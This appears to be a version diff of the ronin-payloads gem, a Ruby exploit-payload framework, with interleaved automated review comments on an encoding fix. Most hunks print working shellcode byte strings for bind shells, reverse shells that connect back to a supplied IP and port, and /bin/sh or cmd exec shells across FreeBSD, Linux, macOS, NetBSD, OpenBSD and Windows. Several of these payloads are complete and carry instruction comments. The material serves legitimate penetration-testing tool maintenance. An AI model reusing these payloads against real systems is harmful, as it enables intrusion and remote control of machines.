ronin-payloads 0.1.5 → 0.1.6

  1. checksums.yaml +4 -4
  2. data/.rubocop.yml +3 -0
  3. data/ChangeLog.md +7 -0
  4. data/README.md +1 -0
  5. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
  6. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
  7. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
  8. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
  9. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
  10. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
  11. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
  12. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
  13. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
  14. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
  15. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
  16. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
  17. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
  18. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
  19. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
  20. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
  21. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
  22. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
  23. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
  24. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
  25. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
  26. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
  27. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
  28. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
  29. data/lib/ronin/payloads/version.rb +1 -1
  30. metadata +2 -2
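--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA256:
- metadata.gz: 23ed6234ba68bb63d9e7e909987b1b4c3b5f8f75048cb9cef20c61d2a5769bcc
- data.tar.gz: de32a35122ac1e6452b3d1a0148fcb0d4089a9fefa951084cc51cd36bd27c98c
+ metadata.gz: 97fb8be02023f3bdaf5ef16711bf1192a574ee10b00a46912c964b01e8577012
+ data.tar.gz: a3eb94423e154cd03df538b3883f58de6c166dc7ba7a8f6da077f192f9c66b44
  SHA512:
- metadata.gz: b5dfda82e5c0fcda3da9d48093921b5bcc6935460f9a6bc434b0891a60bfb08995526a3b39f540d6515faddcfc6d882d7f3f27cb64107300c1bbc0e575f43c3b
- data.tar.gz: 5457d1110e9cd8b544e95cdb890a0d135e6e01b3a4f6b7e3fedacdd84bf9cb12005ee695a6b5b6061d824f3f631c31d75b4a1fd44aabe2f8a343b1cd6fab9c93
+ metadata.gz: c4d865c10c583da8a38aea5bb79f39f1165d15dd54e09594a2a557a4880058d7c6bd6f5411f382f9a49386cd2fc36ada45868a7001135ebc742613c9d732a359
+ data.tar.gz: 795417f0c54ae31283be366941b1f703f67fc3d7cfae9cd13f634b89323b2119e0389cc433638514296327a93f4efdfdad5d63c6458eb46fdb3a5be8f4a192a6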
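--- a/data/.rubocop.yml
+++ b/data/.rubocop.yml
@@ -40,3 +40,6 @@ Style/RedundantLineContinuation:
  Layout/LineContinuationSpacing:
  Exclude:
  - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'
+ Style/StringConcatenation:
+ Exclude:
+ - 'lib/ronin/payloads/builtin/shellcode/**/*.rb'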
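--- a/data/ChangeLog.md
+++ b/data/ChangeLog.md
@@ -1,3 +1,10 @@
+ ### 0.1.6 / 2024-07-01
+
+ #### Payloads
+
+ * Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
+ building shellcode payloads with certain IP addresses or port numbers.
+
  ### 0.1.5 / 2024-06-19
 
  * Fixed order of arguments passed to `TCPServer.new` in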
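--- a/data/README.md
+++ b/data/README.md
@@ -213,6 +213,7 @@ $ git push
  Define a `/bin/sh` shellcode payload:
 
  ```ruby
+ # encoding: ASCII-8BIT
  require 'ronin/payloads/shellcode_payload'
 
  module Ronin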
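--- a/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
  "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
  "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
  "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
- "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23".b
+ "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
  end
 
  end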
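Review bot: Nothing in the file says why the `# encoding: ASCII-8BIT` pragma added at line 1 is there, and it is now load-bearing: the `.b` that used to force the literal to binary is gone from the last fragment of `@payload`, so the whole shellcode literal is binary only because of that first line. Ruby only honours an encoding magic comment on the very first line, so a later header reorder or a tidy-up that moves `# frozen_string_literal: true` back to the top would silently reintroduce the `incompatible character encodings` failure the ChangeLog describes. I would add a plain comment directly beneath it, e.g. `# NOTE: must stay on line 1 -- makes every string literal in this file binary so the shellcode bytes are never reinterpreted as UTF-8.` The `build` method and its class header start outside this hunk.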
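--- a/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
  def build
  @payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
  "\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
- "\x54\x53\xb0\x3b\x50\xcd\x80".b
+ "\x54\x53\xb0\x3b\x50\xcd\x80"
  end
 
  end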
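--- a/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -56,7 +57,7 @@ module Ronin
  "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
  "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
  "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
- "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
+ "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
  end
 
  end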
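--- a/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -53,7 +54,7 @@ module Ronin
  def build
  @payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
  "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
- "\x54\x5f\x52\x57\x54\x5e\x0f\x05".b
+ "\x54\x5f\x52\x57\x54\x5e\x0f\x05"
  end
 
  end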
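--- a/data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -119,7 +120,7 @@ module Ronin
  "\x08\x00\x8d\xe2" \
  "\x00\x10\x8d\xe2" \
  "\x04\x20\x8d\xe2" \
- "\x0b\x00\x90\xef".b
+ "\x0b\x00\x90\xef"
  end
 
  end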
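--- a/data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
  "\xc2\x51\x03\x37" \
  "\x01\xdf\x2f\x62" \
  "\x69\x6e\x2f\x2f" \
- "\x73\x68".b
+ "\x73\x68"
  end
 
  end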
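--- a/data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -72,7 +73,7 @@ module Ronin
  "#{packed_port}" \
  "#{packed_ipv4}" \
  \
- "/bin/sh\0".b
+ "/bin/sh\0"
  end
 
  end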
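Review bot: The removed `.b` could never have protected the `"#{packed_port}"` / `"#{packed_ipv4}"` fragments above it, because backslash-joined literals are one string expression and the interpolation happens while that expression is built, before `.b` is applied to the result; that is presumably where the `incompatible character encodings` exception came from whenever a packed port or address contained a byte above 0x7f. The file-level `# encoding: ASCII-8BIT` fixes it at the right layer, but the fix is now an invisible precondition of `build` that depends on the pragma staying on line 1, and this hunk adds no test for it. I would add a spec that builds this payload with values whose packed bytes exceed 0x7f, e.g. port `443` and host `'192.168.1.200'`, and asserts both `expect(payload.encoding).to eq(Encoding::ASCII_8BIT)` and the exact `bytesize`. `packed_port`, `packed_ipv4` and the start of `build` are outside this hunk, so how those helpers encode their result cannot be checked here.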
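--- a/data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -118,7 +119,7 @@ module Ronin
  "\xf0\xff\xa5\x23" \
  "\xab\x0f\x02\x24" \
  "\x0c\x01\x01\x01" \
- "/bin/sh".b
+ "/bin/sh"
  end
 
  end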
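--- a/data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,18 +52,18 @@ module Ronin
  # Builds the shellcode.
  #
  def build
- @payload = "\x28\x06\xff\xff".b + # slti a2,zero,-1
- "\x3c\x0f\x2f\x2f".b + # lui t7,0x2f2f
- "\x35\xef\x62\x69".b + # ori t7,t7,0x6269
- "\xaf\xaf\xff\xf4".b + # sw t7,-12(sp)
- "\x3c\x0e\x6e\x2f".b + # lui t6,0x6e2f
- "\x35\xce\x73\x68".b + # ori t6,t6,0x7368
- "\xaf\xae\xff\xf8".b + # sw t6,-8(sp)
- "\xaf\xa0\xff\xfc".b + # sw zero,-4(sp)
- "\x27\xa4\xff\xf4".b + # addiu a0,sp,-12
- "\x28\x05\xff\xff".b + # slti a1,zero,-1
- "\x24\x02\x0f\xab".b + # li v0,4011
- "\x01\x01\x01\x0c".b # syscall 0x40404
+ @payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
+ "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
+ "\x35\xef\x62\x69" + # ori t7,t7,0x6269
+ "\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
+ "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
+ "\x35\xce\x73\x68" + # ori t6,t6,0x7368
+ "\xaf\xae\xff\xf8" + # sw t6,-8(sp)
+ "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
+ "\x27\xa4\xff\xf4" + # addiu a0,sp,-12
+ "\x28\x05\xff\xff" + # slti a1,zero,-1
+ "\x24\x02\x0f\xab" + # li v0,4011
+ "\x01\x01\x01\x0c" # syscall 0x40404
  end
 
  end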
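--- a/data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -100,7 +101,7 @@ module Ronin
  "\x27\xa4\xff\xf4" \
  "\x28\x05\xff\xff" \
  "\x24\x02\x0f\xab" \
- "\x01\x01\x01\x0c".b
+ "\x01\x01\x01\x0c"
  end
 
  end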
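--- a/data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,20 +52,20 @@ module Ronin
  # Builds the shellcode.
  #
  def build
- @payload = "\x7c\x3f\x0b\x78".b + # mr r31,r1
- "\x7c\xa5\x2a\x79".b + # xor. r5,r5,r5
- "\x42\x40\xff\xf9".b + # bdzl+ 10000454< main>
- "\x7f\x08\x02\xa6".b + # mflr r24
- "\x3b\x18\x01\x34".b + # addi r24,r24,308
- "\x98\xb8\xfe\xfb".b + # stb r5,-261(r24)
- "\x38\x78\xfe\xf4".b + # addi r3,r24,-268
- "\x90\x61\xff\xf8".b + # stw r3,-8(r1)
- "\x38\x81\xff\xf8".b + # addi r4,r1,-8
- "\x90\xa1\xff\xfc".b + # stw r5,-4(r1)
- "\x3b\xc0\x01\x60".b + # li r30,352
- "\x7f\xc0\x2e\x70".b + # srawi r0,r30,5
- "\x44\xde\xad\xf2".b + # .long 0x44deadf2
- "/bin/shZ".b # the last byte becomes NULL
+ @payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
+ "\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
+ "\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
+ "\x7f\x08\x02\xa6" + # mflr r24
+ "\x3b\x18\x01\x34" + # addi r24,r24,308
+ "\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
+ "\x38\x78\xfe\xf4" + # addi r3,r24,-268
+ "\x90\x61\xff\xf8" + # stw r3,-8(r1)
+ "\x38\x81\xff\xf8" + # addi r4,r1,-8
+ "\x90\xa1\xff\xfc" + # stw r5,-4(r1)
+ "\x3b\xc0\x01\x60" + # li r30,352
+ "\x7f\xc0\x2e\x70" + # srawi r0,r30,5
+ "\x44\xde\xad\xf2" + # .long 0x44deadf2
+ "/bin/shZ" # the last byte becomes NULL
  end
 
  end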
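--- a/data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -125,7 +126,7 @@ module Ronin
  "\x3b\xc0\x01\x60" \
  "\x7f\xc0\x2e\x70" \
  "\x44\xde\xad\xf2" \
- "/bin/shZ".b
+ "/bin/shZ"
  end
 
  end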
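--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -98,7 +99,7 @@ module Ronin
  "\x68\x2f\x62\x69\x6e" \
  "\x89\xe3" \
  "\xb0\x0b" \
- "\xcd\x80".b
+ "\xcd\x80"
  end
 
  end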
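--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -54,7 +55,7 @@ module Ronin
  def build
  @payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
  "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
- "\x80".b
+ "\x80"
  end
 
  end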
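--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -62,7 +63,7 @@ module Ronin
  "\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
  "\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
  "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
- "\x80".b
+ "\x80"
  end
 
  end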
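--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -59,7 +60,7 @@ module Ronin
  "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
  "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
  "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
- "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05".b
+ "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
  end
 
  end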
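--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -51,16 +52,16 @@ module Ronin
  # Builds the shellcode.
  #
  def build
- @payload = "\x48\x31\xd2".b + # xor %rdx, %rdx
- "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68".b + # mov $0x68732f6e69622f2f, %rbx
- "\x48\xc1\xeb\x08".b + # shr $0x8, %rbx
- "\x53".b + # push %rbx
- "\x48\x89\xe7".b + # mov %rsp, %rdi
- "\x50".b + # push %rax
- "\x57".b + # push %rdi
- "\x48\x89\xe6".b + # mov %rsp, %rsi
- "\xb0\x3b".b + # mov $0x3b, %al
- "\x0f\x05".b # syscall
+ @payload = "\x48\x31\xd2" + # xor %rdx, %rdx
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" + # shr $0x8, %rbx
+ "\x53" + # push %rbx
+ "\x48\x89\xe7" + # mov %rsp, %rdi
+ "\x50" + # push %rax
+ "\x57" + # push %rdi
+ "\x48\x89\xe6" + # mov %rsp, %rsi
+ "\xb0\x3b" + # mov $0x3b, %al
+ "\x0f\x05" # syscall
  end
 
  end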
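--- a/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -58,7 +59,7 @@ module Ronin
  "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
  "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
  "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
- "\x5f\x6a\x3b\x58\x0f\x05".b
+ "\x5f\x6a\x3b\x58\x0f\x05"
  end
 
  end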
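--- a/data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -55,7 +56,7 @@ module Ronin
  @payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
  "\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
  "\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
- "\x6e\x2f\x2f\x73\x68".b
+ "\x6e\x2f\x2f\x73\x68"
  end
 
  end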
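--- a/data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
  "\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
  "\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
  "\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
- "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05".b
+ "\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
  end
 
  end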
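--- a/data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -74,7 +75,7 @@ module Ronin
  "\x01\x01\x01\x01" \
  "\x02\x02\x02\x02" \
  "\x03\x03\x03\x03" \
- "\x9a\x04\x04\x04\x04\x07\x04".b
+ "\x9a\x04\x04\x04\x04\x07\x04"
  end
 
  end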
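--- a/data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -60,7 +61,7 @@ module Ronin
  "\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
  "\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
  "\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
- "\x73\x68\x41\x90".b
+ "\x73\x68\x41\x90"
  end
 
  end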
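--- a/data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,18 +53,18 @@ module Ronin
  # Builds the shellcode.
  #
  def build
- @payload = "\x99".b + # cltd
- "\x52".b + # push %edx
- "\x68\x6e\x2f\x73\x68".b + # push $0x68732f6e
- "\x68\x2f\x2f\x62\x69".b + # push $0x69622f2f
- "\x89\xe3".b + # mov %esp,%ebx
- "\x52".b + # push %edx
- "\x54".b + # push %esp
- "\x53".b + # push %ebx
- "\x53".b + # push %ebx
- "\x6a\x3b".b + # push $0x3b
- "\x58".b + # pop %eax
- "\xcd\x80".b # int $0x80
+ @payload = "\x99" + # cltd
+ "\x52" + # push %edx
+ "\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
+ "\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
+ "\x89\xe3" + # mov %esp,%ebx
+ "\x52" + # push %edx
+ "\x54" + # push %esp
+ "\x53" + # push %ebx
+ "\x53" + # push %ebx
+ "\x6a\x3b" + # push $0x3b
+ "\x58" + # pop %eax
+ "\xcd\x80" # int $0x80
  end
 
  end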
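--- a/data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb
+++ b/data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb
@@ -1,3 +1,4 @@
+ # encoding: ASCII-8BIT
  # frozen_string_literal: true
  #
  # ronin-payloads - A Ruby micro-framework for writing and running exploit
@@ -52,26 +53,26 @@ module Ronin
  # Builds the shellcode.
  #
  def build
- @payload = "\x31\xC9".b + # xor ecx,ecx
- "\x64\x8B\x71\x30".b + # mov esi,[fs:ecx+0x30]
- "\x8B\x76\x0C".b + # mov esi,[esi+0xc]
- "\x8B\x76\x1C".b + # mov esi,[esi+0x1c]
- "\x8B\x36".b + # mov esi,[esi]
- "\x8B\x06".b + # mov eax,[esi]
- "\x8B\x68\x08".b + # mov ebp,[eax+0x8]
- "\xEB\x20".b + # jmp short 0x35
- "\x5B".b + # pop ebx
- "\x53".b + # push ebx
- "\x55".b + # push ebp
- "\x5B".b + # pop ebx
- "\x81\xEB\x11\x11\x11\x11".b + # sub ebx,0x11111111
- "\x81\xC3\xDA\x3F\x1A\x11".b + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
- "\xFF\xD3".b + # call ebx
- "\x81\xC3\x11\x11\x11\x11".b + # add ebx,0x11111111
- "\x81\xEB\x8C\xCC\x18\x11".b + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
- "\xFF\xD3".b + # call ebx
- "\xE8\xDB\xFF\xFF\xFF".b + # call dword 0x15
- "\x63\x6d\x64".b # db "cmd"
+ @payload = "\x31\xC9" + # xor ecx,ecx
+ "\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
+ "\x8B\x76\x0C" + # mov esi,[esi+0xc]
+ "\x8B\x76\x1C" + # mov esi,[esi+0x1c]
+ "\x8B\x36" + # mov esi,[esi]
+ "\x8B\x06" + # mov eax,[esi]
+ "\x8B\x68\x08" + # mov ebp,[eax+0x8]
+ "\xEB\x20" + # jmp short 0x35
+ "\x5B" + # pop ebx
+ "\x53" + # push ebx
+ "\x55" + # push ebp
+ "\x5B" + # pop ebx
+ "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
+ "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
+ "\xFF\xD3" + # call ebx
+ "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
+ "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
+ "\xFF\xD3" + # call ebx
+ "\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
+ "\x63\x6d\x64" # db "cmd"
  end
 
  end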
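Review bot: The instruction comments in this `build` describe 32-bit code — `mov esi,[fs:ecx+0x30]` reaches the PEB through `fs`, every register is 32-bit, and the offset notes say `for seven X86` — yet, if the hunk order follows the file list above, this is `windows/x86_64/cmd.rb`; as far as I recall a 64-bit process keeps its PEB at `gs:[0x60]`, so a payload selected by that path would crash rather than spawn `cmd`. Please confirm the intended target and either relocate the file under `windows/x86` or state the constraint in the class documentation, e.g. `# 32-bit x86 only; the ebx deltas are hard-coded for specific Windows builds and must be re-derived for others.` The `add ebx`/`sub ebx` constants also make the payload build-specific, which a user should learn without decoding the hex. The class header sits outside this hunk.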
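--- a/data/lib/ronin/payloads/version.rb
+++ b/data/lib/ronin/payloads/version.rb
@@ -22,6 +22,6 @@
  module Ronin
  module Payloads
  # ronin-payloads version
- VERSION = '0.1.5'
+ VERSION = '0.1.6'
  end
  end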
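--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
  --- !ruby/object:Gem::Specification
  name: ronin-payloads
  version: !ruby/object:Gem::Version
- version: 0.1.5
+ version: 0.1.6
  platform: ruby
  authors:
  - Postmodern
  autorequire:
  bindir: bin
  cert_chain: []
- date: 2024-06-20 00:00:00.000000000 Z
+ date: 2024-07-03 00:00:00.000000000 Z
  dependencies:
  - !ruby/object:Gem::Dependency
  name: ronin-support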